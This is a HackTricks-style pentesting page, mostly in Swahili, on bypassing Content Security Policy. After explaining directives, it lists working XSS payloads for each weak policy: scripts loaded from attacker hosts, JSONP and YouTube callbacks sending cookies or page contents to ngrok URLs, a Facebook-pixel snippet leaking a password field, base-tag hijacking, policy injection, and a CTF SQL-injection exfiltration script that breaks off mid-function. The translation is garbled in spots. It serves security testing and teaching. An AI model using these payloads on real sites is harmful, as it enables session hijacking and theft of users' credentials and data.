# Content Security Policy (CSP) Bypass

{{#include ../../banners/hacktricks-training.md}}

## What is CSP

Content Security Policy (CSP) inatambulika kama teknolojia ya kivinjari, hasa inalenga **kulinda dhidi ya mashambulizi kama vile cross-site scripting (XSS)**. Inafanya kazi kwa kufafanua na kuelezea njia na vyanzo ambavyo rasilimali zinaweza kupakuliwa kwa usalama na kivinjari. Rasilimali hizi zinajumuisha vipengele mbalimbali kama picha, fremu, na JavaScript. Kwa mfano, sera inaweza kuruhusu upakuaji na utekelezaji wa rasilimali kutoka kwa eneo moja (self), ikiwa ni pamoja na rasilimali za ndani na utekelezaji wa msimbo wa mfuatano kupitia kazi kama `eval`, `setTimeout`, au `setInterval`.

Utekelezaji wa CSP unafanywa kupitia **response headers** au kwa kuingiza **meta elements kwenye ukurasa wa HTML**. Kufuatia sera hii, vivinjari vinatekeleza kwa nguvu masharti haya na mara moja kuzuia uvunjaji wowote ulio gundulika.

- Implemented via response header:
```
Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';
```
- Imewekwa kupitia meta tag:
```xml
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
```
### Headers

CSP inaweza kulazimishwa au kufuatiliwa kwa kutumia vichwa hivi:

- `Content-Security-Policy`: Inalazimisha CSP; kivinjari kinazuia ukiukaji wowote.
- `Content-Security-Policy-Report-Only`: Inatumika kwa ajili ya kufuatilia; inaripoti ukiukaji bila kuzuia. Ni bora kwa majaribio katika mazingira ya kabla ya uzalishaji.

### Defining Resources

CSP inakandamiza vyanzo vya kupakia maudhui ya kazi na yasiyo ya kazi, ikidhibiti vipengele kama utekelezaji wa JavaScript wa ndani na matumizi ya `eval()`. Sera mfano ni:
```bash
default-src 'none';
img-src 'self';
script-src 'self' https://code.jquery.com;
style-src 'self';
report-uri /cspreport
font-src 'self' https://addons.cdn.mozilla.net;
frame-src 'self' https://ic.paypal.com https://paypal.com;
media-src https://videos.cdn.mozilla.net;
object-src 'none';
```
### Directives

- **script-src**: Inaruhusu vyanzo maalum vya JavaScript, ikiwa ni pamoja na URLs, scripts za ndani, na scripts zinazotolewa na wakala wa matukio au mitindo ya XSLT.
- **default-src**: Inaweka sera ya kawaida ya kupata rasilimali wakati maagizo maalum ya kupata hayapo.
- **child-src**: Inaelezea rasilimali zinazoruhusiwa kwa wafanyakazi wa wavuti na maudhui ya fremu zilizojumuishwa.
- **connect-src**: Inapunguza URLs ambazo zinaweza kupakuliwa kwa kutumia interfaces kama fetch, WebSocket, XMLHttpRequest.
- **frame-src**: Inapunguza URLs za fremu.
- **frame-ancestors**: Inaelezea vyanzo gani vinaweza kuingiza ukurasa wa sasa, inatumika kwa vipengele kama `<frame>`, `<iframe>`, `<object>`, `<embed>`, na `<applet>`.
- **img-src**: Inaelezea vyanzo vinavyoruhusiwa kwa picha.
- **font-src**: Inaelezea vyanzo halali kwa fonts zinazopakiwa kwa kutumia `@font-face`.
- **manifest-src**: Inaelezea vyanzo vinavyoruhusiwa vya faili za manifest ya programu.
- **media-src**: Inaelezea vyanzo vinavyoruhusiwa kwa kupakia vitu vya media.
- **object-src**: Inaelezea vyanzo vinavyoruhusiwa kwa vipengele vya `<object>`, `<embed>`, na `<applet>`.
- **base-uri**: Inaelezea URLs zinazoruhusiwa kwa kupakia kwa kutumia vipengele vya `<base>`.
- **form-action**: Inataja maeneo halali kwa ajili ya kuwasilisha fomu.
- **plugin-types**: Inapunguza aina za mime ambazo ukurasa unaweza kuitisha.
- **upgrade-insecure-requests**: Inawaagiza vivinjari kubadilisha URLs za HTTP kuwa HTTPS.
- **sandbox**: Inatumika vizuizi vinavyofanana na sifa ya sandbox ya `<iframe>`.
- **report-to**: Inaelezea kundi ambalo ripoti itatumwa ikiwa sera itavunjwa.
- **worker-src**: Inaelezea vyanzo halali kwa scripts za Worker, SharedWorker, au ServiceWorker.
- **prefetch-src**: Inaelezea vyanzo halali kwa rasilimali ambazo zitafanywa kupakuliwa au kupakuliwa mapema.
- **navigate-to**: Inapunguza URLs ambazo hati inaweza kuhamia kwa njia yoyote (a, fomu, window.location, window.open, nk.)

### Sources

- `*`: Inaruhusu URLs zote isipokuwa zile zenye mipango ya `data:`, `blob:`, `filesystem:`.
- `'self'`: Inaruhusu kupakia kutoka kwenye kikoa sawa.
- `'data'`: Inaruhusu rasilimali kupakuliwa kupitia mpango wa data (mfano, picha zilizowekwa Base64).
- `'none'`: Inazuia kupakia kutoka chanzo chochote.
- `'unsafe-eval'`: Inaruhusu matumizi ya `eval()` na mbinu zinazofanana, haipendekezwi kwa sababu za usalama.
- `'unsafe-hashes'`: Inaruhusu wakala maalum wa matukio ya ndani.
- `'unsafe-inline'`: Inaruhusu matumizi ya rasilimali za ndani kama `<script>` au `<style>` za ndani, haipendekezwi kwa sababu za usalama.
- `'nonce'`: Orodha ya kibali kwa scripts maalum za ndani zinazotumia nonce ya kijasusi (nambari inayotumika mara moja).
- Ikiwa una utekelezaji wa JS ulio na mipaka, inawezekana kupata nonce iliyotumika ndani ya ukurasa kwa `doc.defaultView.top.document.querySelector("[nonce]")` na kisha kuirudisha ili kupakia script mbaya (ikiwa strict-dynamic inatumika, chanzo chochote kilichoruhusiwa kinaweza kupakia vyanzo vipya hivyo hii haitahitajika), kama ilivyo katika:

<details>

<summary>Load script reusing nonce</summary>
```html
<!-- From https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/ -->
<img
src="x"
ng-on-error='
doc=$event.target.ownerDocument;
a=doc.defaultView.top.document.querySelector("[nonce]");
b=doc.createElement("script");
b.src="//example.com/evil.js";
b.nonce=a.nonce; doc.body.appendChild(b)' />
```
</details>

- `'sha256-<hash>'`: Inaruhusu skripti zilizo na hash maalum ya sha256.
- `'strict-dynamic'`: Inaruhusu kupakia skripti kutoka chanzo chochote ikiwa imeorodheshwa na nonce au hash.
- `'host'`: Inaelezea mwenyeji maalum, kama `example.com`.
- `https:`: Inapunguza URL kwa zile zinazotumia HTTPS.
- `blob:`: Inaruhusu rasilimali kupakiwa kutoka Blob URLs (mfano, Blob URLs zilizo tengenezwa kupitia JavaScript).
- `filesystem:`: Inaruhusu rasilimali kupakiwa kutoka mfumo wa faili.
- `'report-sample'`: Inajumuisha sampuli ya msimbo unaokiuka katika ripoti ya ukiukaji (inafaa kwa ufuatiliaji).
- `'strict-origin'`: Inafanana na 'self' lakini inahakikisha kiwango cha usalama wa itifaki za vyanzo vinavyolingana na hati (mwenyeji salama tu anaweza kupakia rasilimali kutoka kwa wenyeji salama).
- `'strict-origin-when-cross-origin'`: Inatuma URL kamili wakati wa kufanya maombi ya asili moja lakini inatuma tu asili wakati ombi ni la kuvuka asili.
- `'unsafe-allow-redirects'`: Inaruhusu rasilimali kupakiwa ambazo zitarudisha mara moja kwa rasilimali nyingine. Haipendekezwi kwani inadhuru usalama.

## Kanuni za CSP zisizo salama

### 'unsafe-inline'
```yaml
Content-Security-Policy: script-src https://google.com 'unsafe-inline';
```
Working payload: `"/><script>alert(1);</script>`

#### self + 'unsafe-inline' kupitia Iframes

{{#ref}}
csp-bypass-self-+-unsafe-inline-with-iframes.md
{{#endref}}

### 'unsafe-eval'

> [!CAUTION]
> Hii haifanyi kazi, kwa maelezo zaidi [**angalia hii**](https://github.com/HackTricks-wiki/hacktricks/issues/653).
```yaml
Content-Security-Policy: script-src https://google.com 'unsafe-eval';
```
Kifaa kinachofanya kazi:
```html
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
```
### strict-dynamic

Ikiwa unaweza kwa namna fulani kufanya **kodiyako ya JS inayoruhusiwa kuunda tagi mpya ya script** katika DOM na kodiyako ya JS, kwa sababu script inayoruhusiwa inaunda hiyo, **tagi mpya ya script itaruhusiwa kutekelezwa**.

### Wildcard (\*)
```yaml
Content-Security-Policy: script-src 'self' https://google.com https: data *;
```
Kifaa kinachofanya kazi:
```html
"/>'><script src=https://attacker-website.com/evil.js></script>
"/>'><script src=data:text/javascript,alert(1337)></script>
```
### Ukosefu wa object-src na default-src

> [!CAUTION] > **Inaonekana kama hii haifanyi kazi tena**
```yaml
Content-Security-Policy: script-src 'self' ;
```
Inafanya kazi payloads:
```html
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>
```
### Upakuaji wa Faili + 'self'
```yaml
Content-Security-Policy: script-src 'self';  object-src 'none' ;
```
Ikiwa unaweza kupakia faili la JS unaweza kupita hii CSP:

Kifaa kinachofanya kazi:
```html
"/>'><script src="/uploads/picture.png.js"></script>
```
Hata hivyo, kuna uwezekano mkubwa kwamba seva inafanya **uthibitishaji wa faili iliyopakiwa** na itaruhusu tu **kupakia aina fulani za faili**.

Zaidi ya hayo, hata kama ungeweza kupakia **kodii ya JS ndani** ya faili kwa kutumia kiendelezi kinachokubalika na seva (kama: _script.png_), hii haitatosha kwa sababu baadhi ya seva kama seva ya apache **huchagua aina ya MIME ya faili kulingana na kiendelezi** na vivinjari kama Chrome vitakataa **kutekeleza kodii ya Javascript** ndani ya kitu ambacho kinapaswa kuwa picha. "Kwa matumaini", kuna makosa. Kwa mfano, kutoka kwenye CTF nilijifunza kwamba **Apache hajui** kiendelezi _**.wave**_, kwa hivyo haikihudumii kwa **aina ya MIME kama audio/\***.

Kutoka hapa, ikiwa unapata XSS na upakiaji wa faili, na unafanikiwa kupata **kiendelezi kilichokosewa**, unaweza kujaribu kupakia faili yenye kiendelezi hicho na Maudhui ya skripti. Au, ikiwa seva inakagua muundo sahihi wa faili iliyopakiwa, tengeneza polyglot ([mfano kadhaa za polyglot hapa](https://github.com/Polydet/polyglot-database)).

### Form-action

Ikiwa haiwezekani kuingiza JS, bado unaweza kujaribu kutoa kwa mfano akidi **kwa kuingiza hatua ya fomu** (na labda kutarajia wasimamizi wa nywila kujaza nywila kiotomatiki). Unaweza kupata [**mfano katika ripoti hii**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp). Pia, zingatia kwamba `default-src` haifunika hatua za fomu.

### Third Party Endpoints + ('unsafe-eval')

> [!WARNING]
> Kwa baadhi ya payload zifuatazo **`unsafe-eval` hata haitahitajika**.
```yaml
Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
```
Pakua toleo lenye udhaifu la angular na uendeleze JS isiyo na mipaka:
```xml
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>


"><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>


"><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>


With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-author-writeup/
<script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js></script>
<iframe/ng-app/ng-csp/srcdoc="
<script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.0/angular.js>
</script>
<img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
>
```
#### Payloads using Angular + a library with functions that return the `window` object ([check out this post](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):

> [!NOTE]
> Chapisho linaonyesha kwamba unaweza **kupakia** maktaba zote kutoka `cdn.cloudflare.com` (au repo nyingine yoyote ya maktaba za JS zilizoruhusiwa), kutekeleza kazi zote zilizoongezwa kutoka kila maktaba, na kuangalia **ni kazi zipi kutoka maktaba zipi zinazorudisha kipande cha `window`**.
```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
<div ng-app ng-csp>
{{$on.curry.call().alert(1)}}
{{[].empty.call().alert([].empty.call().document.domain)}}
{{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
</div>


<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
<div ng-app ng-csp>
{{$on.curry.call().alert('xss')}}
</div>


<script src="https://cdnjs.cloudflare.com/ajax/libs/mootools/1.6.0/mootools-core.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
<div ng-app ng-csp>
{{[].erase.call().alert('xss')}}
</div>
```
Angular XSS kutoka kwa jina la darasa:
```html
<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
</div>
```
#### Kutumia vibaya msimbo wa JS wa google recaptcha

Kulingana na [**hii CTF writeup**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=es&_x_tr_pto=wapp#noteninja-3-solves) unaweza kutumia vibaya [https://www.google.com/recaptcha/](https://www.google.com/recaptcha/) ndani ya CSP ili kutekeleza msimbo wa JS wa kiholela ukipita CSP:
```html
<div
ng-controller="CarouselController as c"
ng-init="c.init()"
>
&#91[c.element.ownerDocument.defaultView.parent.location="http://google.com?"+c.element.ownerDocument.cookie]]
<div carousel><div slides></div></div>

<script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
```
Zaidi ya [**payloads kutoka kwa andiko hili**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/):
```html
<script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>

<!-- Trigger alert -->
<img src="x" ng-on-error="$event.target.ownerDocument.defaultView.alert(1)" />

<!-- Reuse nonce -->
<img
src="x"
ng-on-error='
doc=$event.target.ownerDocument;
a=doc.defaultView.top.document.querySelector("[nonce]");
b=doc.createElement("script");
b.src="//example.com/evil.js";
b.nonce=a.nonce; doc.body.appendChild(b)' />
```
#### Abusing www.google.com for open redirect

URL ifuatayo inarejelea example.com (kutoka [hapa](https://www.landh.tech/blog/20240304-google-hack-50000/)):
```
https://www.google.com/amp/s/example.com/
```
Kunyanyasa \*.google.com/script.google.com

Inawezekana kunyanyasa Google Apps Script kupokea taarifa katika ukurasa ndani ya script.google.com. Kama ilivyo [fanywa katika ripoti hii](https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/).

### Mipangilio ya Tatu + JSONP
```http
Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
```
Mifano kama hii ambapo `script-src` imewekwa kwa `self` na kikoa maalum ambacho kimeorodheshwa kinaweza kupitishwa kwa kutumia JSONP. JSONP endpoints zinaruhusu mbinu zisizo salama za callback ambazo zinamruhusu mshambuliaji kutekeleza XSS, payload inayofanya kazi:
```html
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
```

```html
https://www.youtube.com/oembed?callback=alert;
<script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script>
```
[**JSONBee**](https://github.com/zigoo0/JSONBee) **ina viwango vya JSONP vilivyo tayari kutumika kwa CSP bypass ya tovuti tofauti.**

Uthibitisho sawa utaonekana ikiwa **kiwango kinachotegemewa kina Open Redirect** kwa sababu ikiwa kiwango cha awali kinategemewa, redirects zinategemewa.

### Matumizi Mabaya ya Watu wa Tatu

Kama ilivyoelezwa katika [post ifuatayo](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses), kuna maeneo mengi ya watu wa tatu, ambayo yanaweza kuruhusiwa mahali fulani katika CSP, yanaweza kutumika vibaya ili kuhamasisha data au kutekeleza msimbo wa JavaScript. Baadhi ya watu hawa wa tatu ni:

| Kituo            | Tovuti Iliyokubaliwa                        | Uwezo       |
| ----------------- | ------------------------------------------ | ------------ |
| Facebook          | www.facebook.com, \*.facebook.com          | Exfil        |
| Hotjar            | \*.hotjar.com, ask.hotjar.io              | Exfil        |
| Jsdelivr          | \*.jsdelivr.com, cdn.jsdelivr.net          | Exec         |
| Amazon CloudFront | \*.cloudfront.net                          | Exfil, Exec  |
| Amazon AWS        | \*.amazonaws.com                           | Exfil, Exec  |
| Azure Websites    | \*.azurewebsites.net, \*.azurestaticapps.net | Exfil, Exec  |
| Salesforce Heroku | \*.herokuapp.com                           | Exfil, Exec  |
| Google Firebase   | \*.firebaseapp.com                         | Exfil, Exec  |

Ikiwa utapata yoyote ya tovuti zilizokubaliwa katika CSP ya lengo lako, kuna uwezekano kwamba unaweza kuweza kupita CSP kwa kujiandikisha kwenye huduma ya mtu wa tatu na, ama kuhamasisha data kwa huduma hiyo au kutekeleza msimbo. 

Kwa mfano, ikiwa utapata CSP ifuatayo:
```
Content-Security-Policy​: default-src 'self’ www.facebook.com;​
```
au
```
Content-Security-Policy​: connect-src www.facebook.com;​
```
Unapaswa kuwa na uwezo wa kuhamasisha data, kama ilivyokuwa kila wakati na [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/). Katika kesi hii, unafuata hatua hizi za jumla:

1. Unda akaunti ya Facebook Developer hapa.
2. Unda programu mpya ya "Facebook Login" na uchague "Website".
3. Nenda kwenye "Settings -> Basic" na pata "App ID" yako.
4. Katika tovuti unayotaka kuhamasisha data kutoka, unaweza kuhamasisha data kwa kutumia moja kwa moja gadget ya Facebook SDK "fbq" kupitia "customEvent" na payload ya data.
5. Nenda kwenye "Event Manager" ya programu yako na uchague programu uliyounda (kumbuka meneja wa matukio unaweza kupatikana katika URL kama hii: https://www.facebook.com/events\_manager2/list/pixel/\[app-id]/test\_events).
6. Chagua tab "Test Events" ili kuona matukio yanayotumwa na "tovuti yako".

Kisha, upande wa mwathirika, unatekeleza msimbo ufuatao kuanzisha pixel ya ufuatiliaji wa Facebook ili kuelekeza kwenye app-id ya akaunti ya mtengenezaji wa Facebook ya mshambuliaji na kutoa tukio maalum kama hili:
```JavaScript
fbq('init', '1279785999289471');​ // this number should be the App ID of the attacker's Meta/Facebook account
fbq('trackCustom', 'My-Custom-Event',{​
data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"​
});
```
Kuhusu maeneo mengine saba ya tatu yaliyotajwa katika jedwali lililopita, kuna njia nyingi nyingine ambazo unaweza kuzitumia vibaya. Rejelea [blog post](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses) iliyotangulia kwa maelezo zaidi kuhusu matumizi mabaya ya wengine wa tatu.

### Bypass via RPO (Relative Path Overwrite) <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>

Mbali na kuelekeza hapo juu ili kupita vizuizi vya njia, kuna mbinu nyingine inayoitwa Relative Path Overwrite (RPO) ambayo inaweza kutumika kwenye baadhi ya seva.

Kwa mfano, ikiwa CSP inaruhusu njia `https://example.com/scripts/react/`, inaweza kupitishwa kama ifuatavyo:
```html
<script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>
```
Brahara hatimaye itapakia `https://example.com/scripts/angular/angular.js`.

Hii inafanya kazi kwa sababu kwa brahara, unachukua faili iliyo na jina `..%2fangular%2fangular.js` iliyoko chini ya `https://example.com/scripts/react/`, ambayo inakubaliana na CSP.

∑, wataifungua, kwa ufanisi wakitafuta `https://example.com/scripts/react/../angular/angular.js`, ambayo ni sawa na `https://example.com/scripts/angular/angular.js`.

Kwa **kutumia ukosefu huu wa uwiano katika tafsiri ya URL kati ya brahara na seva, sheria za njia zinaweza kupuuziliwa mbali**.

Suluhisho ni kutotreat `%2f` kama `/` upande wa seva, kuhakikisha tafsiri inayofanana kati ya brahara na seva ili kuepuka tatizo hili.

Mfano Mtandaoni:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)

### Utekelezaji wa JS wa Iframes

{{#ref}}
../xss-cross-site-scripting/iframes-in-xss-and-csp.md
{{#endref}}

### kukosekana kwa **base-uri**

Ikiwa **base-uri** haipo unaweza kuitumia vibaya ili kufanya [**dangling markup injection**](../dangling-markup-html-scriptless-injection/index.html).

Zaidi ya hayo, ikiwa **ukurasa unachukua script kwa kutumia njia ya relative** (kama `<script src="/js/app.js">`) kwa kutumia **Nonce**, unaweza kuitumia vibaya **base** **tag** ili kufanya **ipakie** script kutoka **seva yako mwenyewe kufikia XSS.**\
Ikiwa ukurasa ulio hatarini unachukuliwa na **httpS**, tumia URL ya httpS katika base.
```html
<base href="https://www.attacker.com/" />
```
### Matukio ya AngularJS

Sera maalum inayojulikana kama Content Security Policy (CSP) inaweza kuzuia matukio ya JavaScript. Hata hivyo, AngularJS inatoa matukio ya kawaida kama mbadala. Ndani ya tukio, AngularJS inatoa kitu cha kipekee `$event`, kinachorejelea kitu asilia cha tukio la kivinjari. Kitu hiki cha `$event` kinaweza kutumika kuzunguka CSP. Kwa kuzingatia, katika Chrome, kitu cha `$event/event` kina sifa ya `path`, kinachoshikilia orodha ya vitu vilivyohusishwa na mchakato wa utekelezaji wa tukio, ambapo kitu cha `window` daima kiko mwishoni. Muundo huu ni muhimu kwa mbinu za kutoroka kwenye sandbox.

Kwa kuelekeza orodha hii kwa kichujio cha `orderBy`, inawezekana kuzunguka juu yake, ikitumia kipengele cha mwisho (kitu cha `window`) kuanzisha kazi ya kimataifa kama `alert()`. Kipande cha msimbo kilichoonyeshwa hapa chini kinaelezea mchakato huu:
```xml
<input%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27>#x
?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x
```
Hii sehemu inaonyesha matumizi ya `ng-focus` directive ili kuanzisha tukio, ikitumia `$event.path|orderBy` kubadilisha array ya `path`, na kutumia kituo cha `window` kutekeleza kazi ya `alert()`, hivyo kufichua `document.cookie`.

**Pata bypass nyingine za Angular katika** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)

### AngularJS na domain iliyoorodheshwa
```
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
```
Sera ya CSP inayoruhusu maeneo ya kupakia skripti katika programu ya Angular JS inaweza kupitishwa kupitia mwito wa kazi za kurudi na baadhi ya madarasa yaliyo hatarini. Taarifa zaidi kuhusu mbinu hii inaweza kupatikana katika mwongozo wa kina ulio kwenye [git repository](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22).

Payloads zinazofanya kazi:
```html
<script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>

<!-- no longer working -->
<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">
```
Other JSONP arbitrary execution endpoints can be found in [**here**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) (some of them were deleted or fixed)

### Bypass via Redirection

Nini kinatokea wakati CSP inakutana na uelekeo wa upande wa seva? Ikiwa uelekeo unapeleka kwenye asili tofauti ambayo hairuhusiwi, bado itashindwa.

Hata hivyo, kulingana na maelezo katika [CSP spec 4.2.2.3. Paths and Redirects](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects), ikiwa uelekeo unapeleka kwenye njia tofauti, inaweza kupita vizuizi vya awali.

Here's an example:
```html
<!DOCTYPE html>
<html>
<head>
<meta
http-equiv="Content-Security-Policy"
content="script-src http://localhost:5555 https://www.google.com/a/b/c/d" />
</head>
<body>
<div id="userContent">
<script src="https://https://www.google.com/test"></script>
<script src="https://https://www.google.com/a/test"></script>
<script src="http://localhost:5555/301"></script>
</div>
</body>
</html>
```
Ikiwa CSP imewekwa kwa `https://www.google.com/a/b/c/d`, kwa kuwa njia inachukuliwa, skripti za `/test` na `/a/test` zitazuiliwa na CSP.

Hata hivyo, `http://localhost:5555/301` itakuwa **imeelekezwa upande wa seva kwa `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`**. Kwa kuwa ni kuelekezwa, **njia haitachukuliwa**, na **skripti inaweza kupakiwa**, hivyo kuzunguka kikomo cha njia.

Kwa kuelekezwa huku, hata kama njia imeelezwa kikamilifu, bado itazungukwa.

Kwa hivyo, suluhisho bora ni kuhakikisha kwamba tovuti haina udhaifu wowote wa kuelekeza wazi na kwamba hakuna maeneo ambayo yanaweza kutumika katika sheria za CSP.

### Zungusha CSP na alama zisizokamilika

Soma [jinsi hapa](../dangling-markup-html-scriptless-injection/index.html).

### 'unsafe-inline'; img-src \*; kupitia XSS
```
default-src 'self' 'unsafe-inline'; img-src *;
```
`'unsafe-inline'` inamaanisha kwamba unaweza kutekeleza script yoyote ndani ya msimbo (XSS inaweza kutekeleza msimbo) na `img-src *` inamaanisha kwamba unaweza kutumia picha yoyote kutoka kwa rasilimali yoyote kwenye ukurasa wa wavuti.

Unaweza kupita CSP hii kwa kutolewa kwa data kupitia picha (katika tukio hili XSS inatumia CSRF ambapo ukurasa unaopatikana na bot una SQLi, na kutoa bendera kupitia picha):
```javascript
<script>
fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new
Image().src='http://PLAYER_SERVER/?'+_)
</script>
```
From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)

Unaweza pia kutumia usanidi huu **kupakia msimbo wa javascript ulioingizwa ndani ya picha**. Ikiwa kwa mfano, ukurasa unaruhusu kupakia picha kutoka Twitter. Unaweza **kuunda** **picha maalum**, **kuipakia** kwenye Twitter na kutumia "**unsafe-inline**" **kutekeleza** msimbo wa JS (kama XSS ya kawaida) ambayo it **pakiwa** **picha**, **kuondoa** **JS** kutoka kwake na **kuitekeleza** **hiyo**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)

### Kwa Wafanyakazi wa Huduma

Kazi za wafanyakazi wa huduma **`importScripts`** hazipunguzwi na CSP:

{{#ref}}
../xss-cross-site-scripting/abusing-service-workers.md
{{#endref}}

### Uingizaji wa Sera

**Utafiti:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)

#### Chrome

Ikiwa **parameta** iliyotumwa na wewe inakua **imebandikwa ndani** ya **tangazo** la **sera,** basi unaweza **kubadilisha** **sera** kwa njia fulani ambayo inafanya **iwe haina maana**. Unaweza **kuruhusu script 'unsafe-inline'** na mojawapo ya hizi bypasses:
```bash
script-src-elem *; script-src-attr *
script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
```
Kwa sababu hii **itaandika upya maagizo ya script-src** yaliyopo.\
Unaweza kupata mfano hapa: [http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)

#### Edge

Katika Edge ni rahisi zaidi. Ikiwa unaweza kuongeza katika CSP tu hii: **`;_`** **Edge** it **afuta** sera nzima.\
Mfano: [http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](<http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E>)

### img-src \*; kupitia XSS (iframe) - Shambulio la Wakati

Tazama ukosefu wa agizo `'unsafe-inline'`\
Wakati huu unaweza kumfanya mwathirika **paku** ukurasa katika **udhibiti wako** kupitia **XSS** na `<iframe`. Wakati huu unataka kumfanya mwathirika aingie kwenye ukurasa ambao unataka kutoa taarifa (**CSRF**). Huwezi kufikia maudhui ya ukurasa, lakini ikiwa kwa namna fulani unaweza **kudhibiti wakati ukurasa unahitaji kupakia** unaweza kutoa taarifa unazohitaji.

Wakati huu **bendera** itachukuliwa, kila wakati **herufi inakisiwa kwa usahihi** kupitia SQLi **jibu** linachukua **muda zaidi** kutokana na kazi ya kulala. Kisha, utaweza kutoa bendera:
```html
<!--code from https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle -->
<iframe name="f" id="g"></iframe> // The bot will load an URL with the payload
<script>
let host = "http://x-oracle-v1.nn9ed.ka0labs.org"
function gen(x) {
x = escape(x.replace(/_/g, "\\_"))
return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag%20like%20'${x}%25'and%201=sleep(0.1)%23`
}

function gen2(x) {
x = escape(x)
